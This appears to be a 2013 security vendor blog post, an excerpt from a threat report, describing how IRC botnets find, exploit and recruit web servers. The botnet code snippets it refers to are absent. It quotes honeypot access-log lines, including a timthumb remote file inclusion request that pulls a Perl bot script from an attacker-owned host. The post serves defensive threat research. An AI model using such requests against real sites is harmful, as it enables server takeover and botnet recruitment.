SpiderLabs Blog

The Life Cycle of Web Server Botnet Recruitment

Written by | Mar 6, 2013 11:56:00 AM

This blog post is an excerpt taken from the recently released Global Security Report (GSR) for 2013.

Over the course of the past year, my team has monitored and analyzed vast amounts of data within our Web honeypots and shared intelligence in our [Honeypot Alert] blog posts. In this blog post, we want to illustrate the most common methods botnet owners use to compromise websites and make them part of their army. The data in this section shows examples of code snippets and log file entries from real captured attacks.

Why target web servers vs. infecting end-user computers? There are a number of factors that make web servers attractive targets for botnet owners:
  1. Web servers are always online where as home computer systems are often shutdown when not in use. This means that the number of botnet systems in control at any one time is variable. This factors into the botnet owner's service offerings as they are often selling their botnet services and having a reliable, strong botnet is key.
  2. Web servers have more network bandwidth than home computer users. This essentially is a Quality of Service metric where commercial web servers are guaranteed specific amounts of network bandwidth usage whereas home computer users typically have much less bandwidth. Additionally, home user network traffic is oftentimes throttled which would make their DDoS attack traffic less.
  3. Web servers have more horse power then home computers. The number of CPUs, RAM, etc... means that commercial servers can generate much more network DDoS traffic then home computer systems.
  4. Web servers are less likely to be blacklisted by ISP vs. home computer systems. This means that web server botnet zombies will be online, sending traffic much longer than home computers.
Essentially, web server botnet participants are like "Super Soldiers" compared to normal grunts in the botnet army.

Step 1: IRC botnet instructs zombies to search for targets

First, attackers identify potential target sites. While it is possible to methodically scan network ranges looking for targets, it is more efficient to use data already collected by legitimate search sites (e.g., Google, Bing, Yahoo). By using their built-in search capabilities, botnet operators can instruct zombies (previously compromised websites or home computer systems) to send custom search queries. Here is an example of the IRC botnet help interface that lists command options:

Here is a listing of the top web vulnerabilities that are targeted by botnet attackers:



If the attacker wants to execute an RFI attack, it will execute this section of code:

Step 2: IRC botnet zombies conduct search engine queries

Zombie clients receive their search commands from the operator and use code to send requests to the various search engines. The results are then parsed to identify target websites that match the vulnerability search data.

Here is an example section of a Perl botnet client's code that lists various Search Engines to use:

And here is the section of code that sends the actual queries:

Step 3: IRC botnet instructs zombie to scan targets for vulnerabilities

Next, zombies verify the existence of the vulnerabilities in the target websites. Here is an example access_log entry:

 187.45.185.36 - - [06/Mar/2013:02:07:09 +0100] "GET /wp-content/themes/kingsize/timthumb.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" 

Step 4: IRC botnet instructs zombie to exploit vulnerability & install botnet client code

These malicious requests attempt to trick the Web application into downloading the code (hosted on a remote, attacker-owned site). If the Web application is vulnerable, it attempts to download the code. In most cases, simply downloading the code is enough, since the attacker can access the file by Web browser.

187.45.185.36 - - [06/Mar/2013:02:07:11 +0100] "GET /wp-content/themes/kingsize/timthumb.php?src=http://picasa.com.ritile.com/black.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"

In this case, the black.txt file is a Perl IRC botnet client script that executes and then logs the compromised web server into the attacker's IRC channel:

The botnet owner then continues this process over and over again amassing a huge army of compromised web servers.

Post-Recruitment Actions

There are many different tasks that a large botnet can perform for their operator, however the most prevalent one at this point is initiating DDoS attacks as part of either Hacktivist or For-Profit campaigns. Here is an example "HTTPFlood" section of code: